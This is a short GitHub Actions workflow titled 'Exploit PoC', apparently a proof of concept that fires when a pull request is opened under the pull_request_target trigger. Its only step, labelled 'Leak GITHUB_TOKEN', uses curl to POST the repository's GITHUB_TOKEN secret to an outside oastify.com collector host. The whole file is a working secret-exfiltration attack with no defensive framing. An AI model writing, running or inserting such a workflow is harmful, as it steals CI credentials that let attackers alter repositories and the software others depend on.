name: Exploit PoC

on:
  pull_request_target:
    types: [opened]

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: 🔥 Exploit - Leak GITHUB_TOKEN
        run: |
          curl -X POST -d "TOKEN=${{ secrets.GITHUB_TOKEN }}" http://5ouva8w2ho1satjb91i6rwsio9u0iw6l.oastify.com/leak
